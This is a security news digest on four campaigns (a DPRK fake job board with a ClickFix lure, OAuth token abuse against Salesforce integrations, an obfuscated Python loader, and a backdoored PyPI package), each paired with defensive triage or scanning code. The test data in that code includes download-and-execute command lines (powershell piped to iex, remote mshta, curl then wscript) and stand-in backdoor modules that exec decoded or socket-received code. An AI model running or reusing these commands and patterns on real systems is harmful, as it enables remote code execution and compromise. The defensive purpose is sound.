Update: DPRK Expands Contagious Interview Operation With Full Fake Job Platform Targeting U.S. AI Talent
Researchers have uncovered a highly polished fake recruitment platform built as part of a new variant of the DPRK-linked Contagious Interview operation. Unlike earlier lures that relied on simple login pages, this version uses a complete React and Next.js job board filled with fabricated listings impersonating companies in the AI, crypto, and Web3 sectors. The site mimics legitimate hiring workflows, offering realistic job descriptions, resume upload features, and synthetic branding that resembles modern AI tooling ecosystems. This extensive credibility layer is meant to keep applicants engaged long enough to funnel them into the malware-delivery stage while simultaneously harvesting resumes, personal details, and professional links valuable to DPRK intelligence efforts. The malicious payload is delivered through a weaponized “Video Introduction” step that triggers a ClickFix-style clipboard hijack. When applicants attempt to follow troubleshooting instructions, their clipboard contents are silently overwritten with a multi-stage command sequence that downloads a fake driver update, retrieves secondary components from the attacker's infrastructure, and executes a VBScript loader for persistence and follow-on activity. This design reflects a maturation of DPRK tradecraft by blending malware delivery into workflows that mirror standard remote hiring practices for technical roles. The choice to impersonate AI labs and cryptocurrency companies aligns with DPRK collection priorities, offering potential access to privileged developer environments, model artifacts, crypto systems, and sensitive research. Defenders and job seekers are advised to verify that career portals are hosted on official domains and to avoid executing any code or commands supplied by untrusted external hiring platforms.
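The clipboard hijack described above leaves a forensic trail only if the victim actually runs what was planted. The following is an added example, not code from the report or the researchers: it triages commands recovered from a Windows RunMRU key (the Win+R history, assumed here as the paste target) against generic copy-and-run indicators. The registry values are constructed, and the indicator list is a heuristic for ClickFix-style lures in general rather than the specific command sequence used in this campaign.

```python
"""Triage of commands run after a ClickFix-style clipboard hijack.
Added example, not code from the report. The RunMRU entries below are
constructed; the indicators are generic copy-and-run building blocks, not the
specific command sequence used in this campaign."""
import re

# Windows keeps what a user typed into the Win+R dialog under
# HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU. Each value
# ends in "\1" and the MRUList value orders them, newest first. Constructed data.
SAMPLE_RUNMRU = {
    "a": r"notepad\1",
    "b": r'powershell -w hidden -c "irm https://example.invalid/drv.ps1 | iex" # I am not a robot\1',
    "c": r"mshta https://example.invalid/update.hta\1",
    "d": r"cmd /c curl -s https://example.invalid/driver.vbs -o %TEMP%\u.vbs && wscript //B %TEMP%\u.vbs\1",
    "e": r"calc\1",
    "MRUList": "dcbea",
}

# (name, weight, pattern); a total weight of 2 or more flags the command.
INDICATORS = [
    ("powershell_hidden_window", 1, re.compile(r"\bpowershell(\.exe)?\b.*?\s-w(indowstyle)?\s+h(idden)?\b", re.I)),
    ("powershell_encoded", 2, re.compile(r"\bpowershell(\.exe)?\b.*?\s-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("download_cradle", 1, re.compile(r"\b(irm|iwr|invoke-webrequest|invoke-restmethod|curl|wget|certutil)\b.*https?://", re.I)),
    ("pipe_to_iex", 2, re.compile(r"\|\s*(iex|invoke-expression)\b", re.I)),
    ("mshta_remote", 2, re.compile(r"\bmshta(\.exe)?\b.*https?://", re.I)),
    ("script_host_vbs", 1, re.compile(r"\b(wscript|cscript)(\.exe)?\b.*\.vbs\b", re.I)),
    ("decoy_comment", 1, re.compile(r"\s#\s*[^#]{5,}$")),  # "# I am not a robot" style trailer
]


def parse_runmru(values):
    """Return commands newest-first, stripping the trailing "\\1" marker."""
    cmds = []
    for key in values.get("MRUList", ""):
        raw = values.get(key)
        if raw is None:
            continue
        cmds.append(raw[:-2] if raw.endswith("\\1") else raw)
    return cmds


def score_command(cmd):
    """Return (score, [indicator names]) for a single command line."""
    hits = [(name, w) for name, w, rx in INDICATORS if rx.search(cmd)]
    return sum(w for _, w in hits), [name for name, _ in hits]


def triage(values, threshold=2):
    """Flag RunMRU commands whose combined indicator weight reaches the threshold."""
    findings = []
    for cmd in parse_runmru(values):
        score, hits = score_command(cmd)
        if score >= threshold:
            findings.append({"command": cmd, "score": score, "indicators": hits})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_RUNMRU):
        print(f["score"], f["indicators"], f["command"])
```

Weighting lets a single strong indicator (remote mshta, a pipe into iex) flag on its own while weaker ones (a download tool, a decoy comment) must combine; the same scoring can be pointed at PowerShell console history or terminal logs if the lure instructs the victim to paste somewhere other than the Run dialog.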
Update: ShinyHunters Target Gainsight–Salesforce Integrations Through OAuth Token Abuse
Salesforce has disclosed that it detected unusual activity involving Gainsight-published applications, prompting it to revoke all associated OAuth access and refresh tokens and to remove the apps from its marketplace while the investigation continues. Salesforce's analysis indicates the activity stemmed from compromised third-party OAuth tokens used by those applications, which let the threat actors act as the trusted Gainsight integration and access certain customers' Salesforce data through the app's external connection without ever interacting with Salesforce user accounts directly. Google's threat intelligence team assesses the activity as part of a broader ShinyHunters campaign against SaaS ecosystems that harvests and abuses OAuth tokens from multiple vendors, echoing earlier incidents this year involving Salesloft Drift and other SaaS connectors. Gainsight, HubSpot, and Zendesk have temporarily disabled or delisted the affected integrations as a precaution while forensic reviews proceed. The incident illustrates the systemic risk posed by long-lived SaaS integrations: a compromised token bypasses MFA, produces no interactive login telemetry, and enables cross-platform data access. Administrators are urged to audit connected apps immediately, revoke stale or high-risk tokens, and rotate credentials tied to any Gainsight-related integration.
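The audit recommended above comes down to enumerating issued tokens and deciding which to revoke. The following is an added example, not Salesforce's or Gainsight's code: an offline triage over token records of the shape returned by a SOQL query against the OauthToken object (the query text in the docstring and the DELETE path in `revocation_request` are assumptions to be confirmed against your org's API version; the page does not describe either). The records and the review timestamp are constructed.

```python
"""Triage of Salesforce connected-app tokens after a vendor-side compromise.
Added example; records are constructed. Assumed source query (not from the page):
  SELECT Id, AppName, UserId, CreatedDate, LastUsedDate, UseCount FROM OauthToken
"""
from datetime import datetime, timedelta, timezone

SF_TS = "%Y-%m-%dT%H:%M:%S.%f%z"  # timestamp layout Salesforce REST returns

# Constructed records; field names follow the OauthToken object.
SAMPLE_TOKENS = [
    {"Id": "0Ha000000000001", "AppName": "Gainsight Connector", "UserId": "005000000000001",
     "CreatedDate": "2025-03-02T10:11:00.000+0000", "LastUsedDate": "2025-11-20T03:14:00.000+0000",
     "UseCount": 48211},
    {"Id": "0Ha000000000002", "AppName": "Slack", "UserId": "005000000000002",
     "CreatedDate": "2024-06-15T08:00:00.000+0000", "LastUsedDate": "2025-11-19T17:02:00.000+0000",
     "UseCount": 9120},
    {"Id": "0Ha000000000003", "AppName": "Legacy BI Export", "UserId": "005000000000003",
     "CreatedDate": "2023-01-10T12:00:00.000+0000", "LastUsedDate": "2025-05-01T09:30:00.000+0000",
     "UseCount": 300},
    {"Id": "0Ha000000000004", "AppName": "Salesforce Mobile", "UserId": "005000000000002",
     "CreatedDate": "2025-10-01T12:00:00.000+0000", "LastUsedDate": None,
     "UseCount": 0},
]

# Constructed review time so the example is reproducible.
REVIEW_TIME = datetime(2025, 11, 21, tzinfo=timezone.utc)


def parse_sf_ts(value):
    """Parse a Salesforce timestamp; None stays None (token never used)."""
    return datetime.strptime(value, SF_TS) if value else None


def triage_tokens(records, now, suspect_apps=("gainsight",), stale_days=90):
    """Decide 'revoke' or 'keep' per token and say why.

    Revoke anything issued to an app from a vendor under investigation, anything
    unused for longer than stale_days, and anything old that was never used.
    """
    cutoff = now - timedelta(days=stale_days)
    decisions = []
    for rec in records:
        reasons = []
        app = (rec.get("AppName") or "").lower()
        if any(s in app for s in suspect_apps):
            reasons.append("app published by a vendor under investigation")
        last_used = parse_sf_ts(rec.get("LastUsedDate"))
        if last_used is None:
            if parse_sf_ts(rec["CreatedDate"]) < cutoff:
                reasons.append("issued but never used")
        elif last_used < cutoff:
            reasons.append(f"unused for more than {stale_days} days")
        decisions.append({
            "Id": rec["Id"],
            "AppName": rec["AppName"],
            "action": "revoke" if reasons else "keep",
            "reasons": reasons,
        })
    return decisions


def revocation_request(token_id, api_version="v61.0"):
    """HTTP method and path to revoke one token via the REST API (assumed, see lead-in)."""
    return "DELETE", f"/services/data/{api_version}/sobjects/OauthToken/{token_id}"


if __name__ == "__main__":
    for d in triage_tokens(SAMPLE_TOKENS, REVIEW_TIME):
        print(d["action"], d["AppName"], d["reasons"])
        if d["action"] == "revoke":
            print("   ", *revocation_request(d["Id"]))
```

Because a compromised token never touches the login flow, LastUsedDate and UseCount on the token record are the only per-token signal here; pair the revocation list with API event logs keyed on the connected app to see what the token actually read before it was pulled.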
Python-Based Loader Uses Heavy Obfuscation and Process Injection to Deliver .NET RAT
Researchers at K7 Labs analyzed a multi-stage Python-based malware loader that uses layered obfuscation and disguised archives to evade detection while delivering a stealthy remote-access payload. The infection chain begins with a PE dropper that decrypts and reconstructs a batch script, which then downloads a file disguised as a PNG that actually contains a RAR archive. The extracted components include a fake .sys file that is really a password-protected archive, a legitimate WinRAR binary to extract it, and a Python runtime impersonating a Windows system file. After execution, the runtime runs a sequence of Base64, BZ2, Zlib, and marshal-based unpacking that reconstructs a large filler-packed blob containing a small marshalled .pyc file responsible for the actual malicious behavior. Once executed, the Python payload injects into the signed Windows binary cvtres[.]exe, allowing the malware to run under the guise of a trusted process. The injected process loads a .NET component from the attacker's infrastructure and establishes an encrypted, bidirectional C2 channel that enables remote command execution, file transfer, and persistent control. The combination of multi-layer obfuscation, archive masquerading, Python runtime bundling, and trusted-process injection reflects a growing trend in loader design aimed at bypassing traditional detection mechanisms. Defenders should rely on behavioral monitoring and process-inspection capabilities to detect anomalous activity in otherwise legitimate Windows binaries.
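The Base64, BZ2, Zlib and marshal stack described above is tedious to peel by hand but mechanical to automate. The following is an added example, not the loader's code or K7's tooling: an unwrapper that recognises each layer by its magic bytes and stops when it reaches a code object, which it then inspects without executing. The packed input is constructed inside the block using the same four layers so the example runs offline; the filler-stripping step the report mentions is not modelled, since the page does not describe the filler format.

```python
"""Peel the base64 / bz2 / zlib / marshal layers the analyzed loader stacks
around its real stage. Added example, not the malware's own code; the packed
sample is constructed here in the same layering so the unwrapper has input."""
import base64
import bz2
import marshal
import re
import types
import zlib

B64_RE = re.compile(rb"^[A-Za-z0-9+/]+={0,2}$")
ZLIB_SECOND_BYTES = (b"\x01", b"\x5e", b"\x9c", b"\xda")  # usual FLG bytes after 0x78


def pack_layers(code_obj):
    """Constructed packer: marshal -> zlib -> bz2 -> base64, innermost first."""
    return base64.b64encode(bz2.compress(zlib.compress(marshal.dumps(code_obj))))


def peel_layer(blob):
    """Recognise one wrapping layer by its magic and strip it; None if nothing matches."""
    if blob[:3] == b"BZh":
        return "bz2", bz2.decompress(blob)
    if blob[:1] == b"\x78" and blob[1:2] in ZLIB_SECOND_BYTES:
        return "zlib", zlib.decompress(blob)
    if blob[:1] in (b"\x63", b"\xe3"):  # marshal type code 'c' (code object), with or without FLAG_REF
        try:
            obj = marshal.loads(blob)
        except Exception:
            obj = None
        if isinstance(obj, types.CodeType):
            return "marshal", obj
    text = blob.strip()
    if B64_RE.match(text) and len(text) % 4 == 0:
        return "base64", base64.b64decode(text, validate=True)
    return None


def unwrap(blob, max_layers=16):
    """Repeatedly peel layers; stop at a code object or when no layer is recognised."""
    layers = []
    current = blob
    for _ in range(max_layers):
        if isinstance(current, types.CodeType):
            break
        peeled = peel_layer(current)
        if peeled is None:
            break
        name, current = peeled
        layers.append(name)
    return layers, current


def strings_in(code_obj):
    """Collect every string constant, recursing into nested code objects."""
    found = []
    for const in code_obj.co_consts:
        if isinstance(const, str):
            found.append(const)
        elif isinstance(const, types.CodeType):
            found.extend(strings_in(const))
    return found


# Constructed stand-in for the loader's small marshalled stage (never executed here).
SAMPLE_STAGE_SRC = (
    "import os\n"
    "HOST = 'c2.example.invalid'\n"
    "def beacon():\n"
    "    return os.name + '@' + HOST\n"
)
SAMPLE_STAGE = compile(SAMPLE_STAGE_SRC, "<stage2>", "exec")
PACKED_SAMPLE = pack_layers(SAMPLE_STAGE)

if __name__ == "__main__":
    layers, stage = unwrap(PACKED_SAMPLE)
    print("layers:", layers)
    print("names:", stage.co_names)
    print("strings:", strings_in(stage))
```

Marshal output is specific to the interpreter version that produced it, so run the unwrapper under the same Python version the loader bundles; `dis.dis(stage)` on the recovered object gives the bytecode listing without ever calling `exec()`.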
Malicious PyPI Package Embeds Multi-Layer Encrypted Backdoor
Researchers have identified a malicious PyPI package named “spellcheckers” that impersonates the legitimate “pyspellchecker” library and embeds a multi-stage encrypted backdoor. The package executes hidden Base64-encoded code during import, contacts an attacker-controlled C2 server, and retrieves a second-stage payload that deploys a Python-based remote access trojan. This backdoor uses layered XOR encryption, custom protocol formatting, silent exception handling, and dynamic code execution to maintain persistent access while avoiding static and behavioral detection. The operation also overlaps with earlier social engineering campaigns in which attackers posed as recruiters to target users’ cryptocurrency information, indicating a broadened focus on supply-chain compromises affecting Python developers. The second stage maintains a continuous polling loop with the C2 server, decrypts incoming commands, and executes attacker-supplied Python code through exec(), providing full remote control over infected systems. The malware reports host details such as operating system and hostname and suppresses all errors to remain silent during execution. By distributing this package via PyPI, the attackers achieved broader reach and leveraged developers’ trust in common dependencies, compromising nearly 1,000 systems before removal. Defenders should monitor for unexpected Base64 decoding and exec() behavior in imported modules, inspect dependencies for hidden import-time code in their package initialization files, and enforce allowlists or isolated build environments to reduce exposure to tampered packages.
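The import-time `exec(base64.b64decode(...))` pattern described above can be caught statically before a package is ever imported. The following is an added example, not the researchers' tooling or the real package: an AST scanner that reports every `exec()`/`eval()` call in a module, which decoder or decompressor feeds it, whether a Base64-shaped literal is present, and whether the call sits at module level (so it runs on import) or inside a function (the polling-loop case). The two module sources are constructed stand-ins and are not the actual “spellcheckers” code.

```python
"""Static scan for exec()/eval() of decoded payloads in Python packages, the
pattern described for the "spellcheckers" package. Added example; the module
sources below are constructed and are not the real package."""
import ast
import pathlib
import re

# Constructed: mimics the shape described (import-time exec of a decoded blob,
# plus a polling loop that exec()s what the C2 sends). Never executed here.
SUSPICIOUS_INIT = '''
import base64, zlib
__version__ = "0.8.1"
exec(base64.b64decode("aW1wb3J0IG9z"))  # hidden stage runs on import

def _loop(sock):
    while True:
        exec(zlib.decompress(sock.recv(65536)))

def correction(word):
    return word.lower()
'''

# Constructed: what a normal __init__.py looks like.
BENIGN_INIT = '''
from .spellchecker import SpellChecker
__all__ = ["SpellChecker"]
'''

DECODERS = {"b64decode", "b32decode", "a85decode", "decodebytes", "unhexlify", "decompress"}
B64_LITERAL = re.compile(r"^[A-Za-z0-9+/]{8,}={0,2}$")
SCOPES = (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef, ast.Lambda)


def _leaf_names(node):
    """Every plain name and attribute name used anywhere inside a subtree."""
    names = set()
    for sub in ast.walk(node):
        if isinstance(sub, ast.Attribute):
            names.add(sub.attr)
        elif isinstance(sub, ast.Name):
            names.add(sub.id)
    return names


def _has_b64_literal(node):
    return any(isinstance(s, ast.Constant) and isinstance(s.value, str)
               and B64_LITERAL.match(s.value) for s in ast.walk(node))


def scan_source(src, path="<module>"):
    """One finding per exec()/eval() call, noting whether it runs at import time."""
    tree = ast.parse(src, filename=path)
    parents = {}
    for parent in ast.walk(tree):
        for child in ast.iter_child_nodes(parent):
            parents[child] = parent
    findings = []
    for node in ast.walk(tree):
        if not (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
                and node.func.id in ("exec", "eval")):
            continue
        # Climb until a def/class/lambda is found; reaching the root means module level.
        scope = parents.get(node)
        while scope is not None and not isinstance(scope, SCOPES):
            scope = parents.get(scope)
        findings.append({
            "path": path,
            "line": node.lineno,
            "call": node.func.id,
            "decoders": sorted(_leaf_names(node) & DECODERS),
            "encoded_literal": _has_b64_literal(node),
            "import_time": scope is None,
        })
    return sorted(findings, key=lambda f: (f["path"], f["line"]))


def scan_package(root):
    """Walk an installed package or unpacked sdist/wheel and scan every .py file."""
    findings = []
    for py in sorted(pathlib.Path(root).rglob("*.py")):
        findings.extend(scan_source(py.read_text(encoding="utf-8", errors="replace"), str(py)))
    return findings


if __name__ == "__main__":
    for finding in scan_source(SUSPICIOUS_INIT, "spellcheckers/__init__.py"):
        print(finding)
```

Run `scan_package()` over `site-packages` or an unpacked wheel in a build container before the dependency is allowed into the environment; an `import_time` hit with a decoder and an encoded literal is the exact combination the report describes, while a function-scoped `exec` fed by a socket or decompressor is the second-stage command loop.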